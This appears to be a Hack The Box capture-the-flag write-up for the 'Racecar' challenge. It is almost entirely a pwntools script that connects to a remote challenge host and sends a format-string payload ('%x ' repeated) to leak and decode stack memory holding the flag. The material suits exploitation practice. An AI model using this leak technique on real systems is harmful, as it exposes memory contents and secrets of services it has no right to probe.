writeups/hackthebox/racecar.md

821 B

Racecar

  • This challenge contains a simple format string exploit. Further instructions can be found in my pentest repo
p = remote('178.62.88.151',31280)

p.recv()
p.sendline(b'whackx')
p.recv()
p.sendline(b'whackx')

print(p.recv())
p.sendline(b'1')
print(p.recv())
p.sendline(b'2')
print(p.recv())
p.sendline(b'1')
print(p.recv())
p.sendline(b'2')

print(p.recv())
p.sendline(b'%x ' *100)
print("[+] send payload")

l = p.recvall()
l =l.split(b'm\n')
l = l[-1].split()
res = []
for x in l[::-1]:
    try:
        #print(bytes.fromhex(x.split()[0].decode())[::-1])
        x = bytes.fromhex(x.decode())[::-1]
        res.append(x.decode())
    except:
        pass
print(''.join(res[::-1]))
p.close()